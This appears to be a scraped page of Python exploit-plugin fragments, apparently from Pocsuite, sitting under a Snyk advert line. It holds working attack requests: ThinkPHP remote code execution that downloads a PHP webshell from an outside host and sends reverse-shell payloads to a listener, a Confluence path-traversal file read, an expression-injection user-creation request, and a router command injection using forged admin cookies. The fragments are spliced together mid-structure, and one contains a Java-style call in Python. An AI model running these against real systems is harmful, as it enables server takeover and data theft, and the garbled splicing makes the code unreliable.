Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def _attack(self):
result = {}
filename = random_str(6) + ".php"
shell_addr = "http://pocsuite.org/include_files/php_attack.txt"
payload = "/index.php?s=captcha&Test=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
filename=filename,
url=shell_addr)
vul_url = self.url + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = "_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
filename=filename,
url=shell_addr
)
requests.post(vul_url, data=data, headers=headers)
r = requests.post(self.url + "/" + filename, data="c=phpinfo();", headers=headers)
if r.status_code == 200 and "PHP Extension Build" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = shell_addr
return self.parse_output(result)
vulurl = self.url + "/index.php?s=captcha"
# 生成写入文件的shellcode
_list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(),
os_target=OS.LINUX,
os_target_arch=OS_ARCH.X86)
for i in _list:
data = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': i
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
requests.post(vulurl, data=data, headers=headers)
def _check(self, url):
flag = 'PHP Extension Build'
data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
payloads = [
r"/index.php?s=captcha"
]
for payload in payloads:
vul_url = url + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
r = requests.post(vul_url, data=data, headers=headers)
if flag in r.text:
return payload, data
return False
def _verify(self):
result = {}
filename = "../web.xml"
limitSize = 1000
paylaod = self.url + "/rest/tinymce/1/macro/preview"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": self.url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "" in r.text:
m = re.search('', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
result['FileInfo']['Filename'] = filename
result['FileInfo']['Content'] = content
return self.parse_output(result)
"firstName": "77",
"lastName": "ss",
"password": "password",
"email": "77@qq.com",
"status": "active",
"roles": [
"$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
]
}
],
"type":"rpc","tid":4}
try:
self.headers.update(self.auth())
print(self.headers)
resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
except Exception as e:
e.printStackTrace()
if self.test_EL(resp):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
def _shell(self):
veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = self.get_option("command")
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
requests.post(veri_url2, data=data, headers=headers)
except Exception as e:
logger.warn(str(e))